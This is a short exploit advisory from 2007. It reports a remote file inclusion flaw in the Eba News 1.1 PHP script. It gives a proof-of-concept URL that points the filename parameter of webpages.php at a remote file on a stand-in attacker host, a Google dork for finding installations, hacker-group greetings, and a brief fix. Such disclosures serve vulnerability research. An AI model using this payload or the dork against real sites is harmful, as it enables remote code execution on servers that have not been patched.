-------------------------------------------------- Eba News Version : v1.1 <= (webpages.php) Remote File Include -------------------------------------------------- Author : SekoMirza Date Found : Nisan 11 2007 Location : Fransa // ... Critical Lvl : Highly critical Impact : System access Where : From Remote -------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Eba News version : 1.1 vendor : http://ebascripts.com/ source url : http://ebascripts.com/ -------------------------------------------------- Description: ~~~~~~~~ EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes. -------------------------------------------------- Vulnerability: ~~~~~~~~~~~ I found vulnerability script in admin/public/webpages.php Proof Of Concept: ~~~~~~~~~~~~ eba/admin/public/webpages.php?filename=http://attact.com/colok.txt? -------------------------------------------------- google d0rk: ~~~~~~~ "Eba News" -------------------------------------------------- Solution: ~~~ - download new version in vendor URL -------------------------------------------------- Shoutz: ~~ ~ My Sweet -> Caramel ~ For Mp3s -> Hypn0sis ~ For Support -> www.starhack.org ~ My Bro -> PhantomOrchid ~ My Preceptor -> Earnk Kazno -------------------------------------------------- Contact: ~~~ Seko[at]se-ko[dot]info -------------------------------- [ EOF ]----------